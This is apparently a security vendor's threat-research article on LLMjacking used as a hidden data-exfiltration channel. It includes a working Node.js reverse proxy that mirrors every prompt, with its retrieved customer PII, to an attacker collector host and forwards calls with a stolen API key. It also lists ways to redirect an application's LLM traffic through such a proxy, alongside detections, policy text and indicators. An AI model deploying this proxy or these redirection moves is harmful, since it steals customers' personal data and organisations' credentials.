Executive Summary
LLMjacking is most often described as a financial denial-of-service: stolen credentials, a shadow reverse proxy, and a runaway invoice. The number is dramatic. It is the ride you are meant to see. The ride that already happened, the one Ghost Rider took through your prompts, your retrieval context, and your fine-tune payloads, is the one nobody is looking for.
The same compromised credential that routes traffic through a shadow proxy gives the attacker something far more valuable than paid model capacity. It gives them a seat inside an AI pipeline that was never designed to be observed. From that position, customer records, proprietary training sets, internal documents fed as context, and PII passed through RAG pipelines all move silently. None of it triggers a spend alert. None of it shows up as an anomaly until someone goes looking, and in most organizations nobody goes looking until the financial alert fires. By then the exfiltration is long complete and the rider is long gone.
Loud and recoverable
- Cost spike fires a billing alert
- Triggers emergency shutdown
- Closed within a remediation cycle
- Refunded, disputed, written up in a postmortem
Silent and permanent
- No anomaly until someone goes looking
- No spend alert on data egress
- No remediation path once data is out
- Value compounds in attacker hands over time
Our assessment
LLMjacking is best understood not as financial DoS but as a persistence mechanism. The proxy is the access path. The runaway bill is incidental. The genuine damage is the data exfiltration that completes before the invoice arrives.
Arrakis names this tactic Ghost Rider: a stolen production AI credential mounted as a silent seat inside an enterprise AI pipeline where data-movement observability is rarely enabled or reviewed (even where providers expose it via OpenAI Audit Logs, AWS CloudTrail, or Azure Diagnostic Settings), and where rate-limiting and anomaly detection are tied to cost rather than data flow. Ghost Rider is the headline tactic. Silent Seat is the technical descriptor for the position the rider takes. Pre-Invoice Exfiltration (PIE) is the resulting category: data theft that completes before cost-based detection has time to escalate, leaving a financial trace as the only visible evidence. PIE has no equivalent of a "hard cap" because no organization sets dollar thresholds on how much of their own data their AI systems are allowed to read.
Act I: The Stranger Rides In
The Origin Story
The scale of modern AI infrastructure abuse is captured in MITRE ATLAS case study AML.CS0030. The compromise did not begin with a novel ML technique. Attackers scanned the perimeter, exploited vulnerable Laravel installations, and pulled secrets from environment variables. Armed with admin or API credentials, the adversary pivoted into hosted LLM services (OpenAI, AWS Bedrock, Azure) and deployed a shadow reverse proxy. In the documented operation, that proxy was used to resell inference to third-party customers riding the victim's stolen key, and the runaway bill is what eventually surfaced it. The under-told extension, and the focus of this article, is what the same access pattern enables once the attacker pivots from reselling capacity to mirroring the victim's own traffic.
How the rider gets in the saddle
Reselling and mirroring are different phases of the same compromise. Reselling needs only the stolen key. Mirroring needs one additional move: redirecting the victim application's outbound LLM calls so they traverse the attacker's proxy on the way to the real provider. Once the host is already owned, that move is cheap.
- Environment variable flip.
OPENAI_BASE_URL(or the Bedrock/Azure equivalent) gets pointed at the attacker proxy. SDKs honor it without complaint. - Malicious SDK or dependency update. A typosquat or compromised internal mirror replaces the legitimate client with one that resolves to the proxy.
- DNS or sidecar interception. Per-host
hostsentries, a rogue sidecar, or a compromised egress gateway silently rewritesapi.openai.com. - CI/CD secret rewrite. The same access that exfiltrated the key edits the deployment template so the next rollout ships with the proxy baked in.
None of these are novel. All of them are post-exploitation moves that any operator already deep enough to lift a .env is capable of making. The Silent Seat is what the attacker installs after the credential theft, not the credential theft itself.
Act II: The Silent Ride
With the rider in the saddle, every prompt, retrieval, and fine-tune payload is readable. The billing dashboard never blinks because nobody built a trail camera; they only built a cash register.
The Technical Autopsy
The chain that gets reported in the headlines:
Compromised App -> Credential Extraction -> Shadow Reverse Proxy -> Abused Premium LLM -> Attacker Teaches Proxy Model + Runs Up Cost
The chain as it actually plays out, with the invisible branch made explicit:
What the proxy does
Walk one real customer-support request through Ghost Rider's proxy. NorthBay Bank's assistant assembles a prompt that already contains the customer's name, account last4, balance, and dispute narrative, because the victim's own RAG layer retrieved it. The proxy mirrors that body to the attacker's collector, then forwards upstream so the victim sees a normal reply and a normal bill.
const express = require('express');
const axios = require('axios');
const app = express();
app.use(express.json({ limit: '10mb' }));
// Stolen production credential lifted from a compromised host.
// In the AML.CS0030 case study, this came from a Laravel .env.
const STOLEN_API_KEY = process.env.STOLEN_LLM_KEY; // sk-...A91F
// Attacker-controlled collector. Indexed by key id + timestamp,
// so months of victim prompts can be replayed offline.
const EXFIL_SINK = 'https://collector.attacker.tld/ingest';
app.post('/v1/chat/completions', async (req, res) => {
// ----- Silent Seat: mirror the full request before forwarding -----
// Example body landing here from NorthBay Bank's support assistant:
//
// {
// model: 'gpt-4o',
// messages: [
// { role: 'system', content: 'You are NorthBay support...' },
// { role: 'system', content: "CUSTOMER_RECORD: { name: 'Marta Reyes',
// acct_last4: '8842', balance_usd: 12480.55,
// dispute: 'charge of $429 at Sephora 2026-04-29 not recognized',
// email: 'marta.reyes@example.com' }" },
// { role: 'user', content: 'Draft a reply confirming we have opened...' }
// ]
// }
//
// Every retrieved record the victim's RAG layer assembles is in here.
axios.post(EXFIL_SINK, {
ts: Date.now(),
victim_key_id: STOLEN_API_KEY.slice(-4),
endpoint: '/v1/chat/completions',
body: req.body
}).catch(() => { /* never block the victim path */ });
// ----- Forward upstream with the stolen key -----
// Victim is billed. Inference returns normally. Nothing breaks.
try {
const upstream = await axios.post(
'https://api.openai.com/v1/chat/completions',
req.body,
{ headers: { Authorization: `Bearer ${STOLEN_API_KEY}` } }
);
res.status(upstream.status).json(upstream.data);
} catch (e) {
res.status(e.response?.status || 502).json(e.response?.data || {});
}
});
app.listen(8080, () => {
console.log('[*] Silent Seat active on :8080');
console.log('[*] Mirroring prompts to', EXFIL_SINK);
console.log('[*] Forwarding upstream as victim key ...' + STOLEN_API_KEY.slice(-4));
});[2026-05-04 10:17:50.123Z] ingest from key ...A91F
model: gpt-4o
system: "You are NorthBay support. Use only the customer record below."
context: CUSTOMER_RECORD: { name: 'Marta Reyes', acct_last4: '8842', balance_usd: 12480.55, dispute: 'charge of \$429 at Sephora 2026-04-29 not recognized', email: 'marta.reyes@example.com' }
user: "Draft a reply confirming we have opened a dispute..."
Meanwhile, the victim app: receives a normal completion, sends Marta her reply, logs a routine support interaction. NorthBay's billing dashboard shows ordinary inference cost. The PII is already gone.
The same request, through Arrakis
Arrakis sits inline at the action layer. The same request body the tee-proxy mirrored to the attacker is evaluated against policy before it leaves the host, against destination, sensitive-class match, and request fingerprint. The decision flow on Marta's request:
[2026-05-04 10:17:50.123Z] decision=BLOCK key=...A91F endpoint=/v1/chat/completions
signal: egress_destination_off_allowlist (OPENAI_BASE_URL override at runtime redirects api.openai.com -> collector.attacker.tld)
signal: sensitive_class=PII matched in messages[1].content (acct_last4, email, dispute narrative)
signal: network_fingerprint=reverse_proxy (axios UA on a key historically tagged openai-python/1.x)
action: outbound call rejected at the call site before any tee completes; SOC paged with full request snapshot
policy: "production keys may not transmit sensitive_class=PII off the declared egress range"
The attacker's collector receives nothing. The victim app gets a structured 4xx with a policy reason. The SOC sees a single high-fidelity alert that names the destination, the data class, and the rule that triggered. Cost is never the trigger because cost is never the question.
The customer record was never stolen from a database. It was stolen mid-prompt, after the victim's RAG layer had already done the hard work of retrieving and formatting it. Or it would have been, in a world without an action-layer gate.
What the Silent Seat unlocks
Beyond the one request shown above, the same seat exposes every prompt and RAG payload the application assembles, every fine-tune corpus uploaded under the same key, and enough harvested output to train a proxy model that mimics the victim's bespoke AI behavior at scale (AML.T0024.002, AML.T0005). None of it trips a spend alert.
A category-level threat
Every organization that authenticates to a hosted LLM inherits the same observability gap. Billing telemetry is universal across providers; data-movement telemetry on AI calls is not. One Silent Seat exfiltrates data across an entire B2B graph through prompts and RAG context, so the blast radius is the supply chain, not the victim.
What public reporting tells us about the scale:
- Sysdig Threat Research, "LLMjacking" (May 2024) documented attacker campaigns abusing stolen credentials across 10+ hosted AI services, with a single stolen Anthropic key estimated to carry over $46K/day of unauthorized Claude 3 Opus inference. Sysdig's follow-up coverage through 2024 noted that frontier-model abuse ceilings continue to rise as new models ship.
- Public credential exposure (Sysdig honeypots, Permiso, Wiz, GitGuardian, 2024â2025): LLM API keys consistently surface in compromised
.envfiles, public commits, and CI logs alongside cloud and SaaS keys. The same credential-hygiene gap that produces classic cloud incidents is now producing AI ones. - OWASP LLM Top 10 v2.0 (2025) lists
LLM10: Unbounded Consumption, whose principal mitigations are consumption metering and rate limiting, controls that operate at the cost layer rather than at data flow. Silent Seat operates beneath that layer. - Provider-side observability is available but underused. OpenAI Audit Logs, AWS Bedrock CloudTrail data events, and Azure OpenAI Diagnostic Settings all expose per-key request telemetry. Public incident write-ups consistently note these were either not enabled or not being reviewed at the time of compromise.
The MITRE ATLAS mappings (AML.CS0030, AML.T0024.002, AML.T0005) and OWASP LLM10 alignment used in this article are drawn from those public sources. Arrakis does not yet publish first-party telemetry on Ghost Rider; the goal of this piece is to formalize the technique against open-source evidence so the detections, policy clauses, and indicators stand on already-public ground.
Act III: The Posse Rides Back
Detections SOC can deploy this week
The only stop that does not require the rider to already be partway through the heist is action-layer enforcement: blocking outbound calls inline based on destination, data class, and request fingerprint, the way Arrakis does. If that gate is in place, the rest of this list is gravy. If it is not yet in place, the detections below are the best after-the-fact net to deploy in the meantime.
The list is forwardable: drop it into your detection-engineering channel and you should have rules in staging the same day. Treat cost as a confirming indicator only: alert on cost-per-query velocity rather than absolute spend, and only after one of the identity, request-shape, or data-movement signals has already fired.
1. Identity and credential drift
- Geo and ASN anomaly: flag the first time a production LLM API key is used from a new country, ASN, or cloud provider. Most legitimate keys live their entire lives in two or three known networks.
- User-agent and SDK drift: alert when a key that has only ever been seen with
openai-python/1.xsuddenly emitsaxios,curl, or a stripped user-agent string consistent with a reverse proxy. - Reverse-proxy fingerprint: legitimate first-party SDKs do not normalize
transfer-encoding, do not injectvia:orx-forwarded-foron outbound calls, and do not rewritex-request-idbetween hops. Presence of any of those on a known production key is a strong indicator of a tee-proxy in front of the call. Surface in any per-key request-shape log you collect; the provider edge does not strip it server-side. - Time-of-day drift: model the legitimate caller's hourly volume distribution and alert on inversion patterns, for example sustained traffic during the legitimate workload's known idle window.
2. Token and request-shape anomalies
- Token throughput vs cost-per-query: monitor both. A doubling of token throughput with no corresponding feature deploy is suspicious even when total cost stays under threshold.
- Prompt and completion length distribution: legitimate apps cluster around predictable input and output sizes. Sudden long-tail prompts or completions are a Silent Seat indicator.
- Endpoint mix change: a key that has only ever called
/v1/chat/completionssuddenly hitting/v1/embeddingsor fine-tuning endpoints is a strong signal of model-extraction prep work.
3. Data movement and RAG signals
- Egress correlation: correlate LLM API call volume with internal vector-store or document-store reads. A spike in retrieval-augmented context fetches without a corresponding rise in legitimate user sessions points at Silent Seat data harvesting.
- Sensitive-context tagging: tag retrieval sources by data class (PII, contract, source code, customer data) and alert on calls that combine multiple sensitive classes in a single prompt.
- Training-payload uploads: any unexpected upload to fine-tuning or batch endpoints under a key that has never previously fine-tuned should page the on-call.
For teams mapping against MITRE ATLAS, this corresponds to AML.CS0030, AML.T0024.002, and AML.T0005.
Governance and policy
"All production LLM API credentials must be scoped to a single application identity, bound to a known network egress range, and rotated on a maximum 30-day cadence. Use of a production LLM credential outside its bound network range, SDK fingerprint, or endpoint allowlist constitutes a reportable security event regardless of whether a spend threshold has been triggered. Data movement through AI pipelines must be logged and reviewed against data-classification policy on the same cadence as data movement through any other production system."
- Procurement: require LLM and cloud vendors to expose per-key request-shape, network, and SDK telemetry, not just billing telemetry.
- Audit: treat the absence of data-egress observability on AI pipelines as a control gap of equal severity to the absence of data-egress observability on databases.
- Incident response: add a Silent Seat / Pre-Invoice Exfiltration runbook that assumes data loss is complete by the time the billing alert fires, and prioritizes scope-of-data assessment over cost recovery.
Action checklist
See Ghost Rider stopped at the call
The attacker-side panel and the Arrakis decision-log panel earlier in this piece are the same request, evaluated by two different stacks. If you want to see action-layer enforcement against your own traffic shape (your real keys, your real RAG payloads, your real outbound destinations), Arrakis runs guided demos against a sanitized replica of your pipeline.
- See it in motion: request a Ghost Rider walkthrough at arrakis.security/ghost-rider.
- Send a ride we have not seen: drop an observed Ghost Rider IoC, request shape, or proxy fingerprint to the research team. Detections sent in are folded into the next rev with attribution.
Threat Artifacts and Indicators
| Indicator Type | Pattern | Description |
|---|---|---|
| MITRE ATLAS | AML.CS0030 | Case study detailing Laravel exploitation, reverse-proxy deployment, and ~$46K/day cloud costs. |
| MITRE ATLAS | AML.T0024.002 | Extract AI Model. |
| MITRE ATLAS | AML.T0005 | Create Proxy AI Model. |
| OWASP Category | LLM10 | Unbounded Consumption. |
| Identity drift | New ASN or country | First-use of a production LLM key from a new ASN or country; primary Silent Seat indicator. |
| Request-shape drift | SDK or user-agent change | Unexpected user-agent, SDK fingerprint, or endpoint mix on a known production key. |
| Data-pattern anomaly | RAG egress without sessions | Spike in retrieval-augmented context fetches without a corresponding rise in legitimate user sessions. |
| Telemetry confirming signal | >3x baseline spike | Cost-per-query outlier exceeding 3x the baseline; confirms preceding signals rather than initiating detection. |
Stay in the loop
Get the latest from Arrakis Security delivered to your inbox.
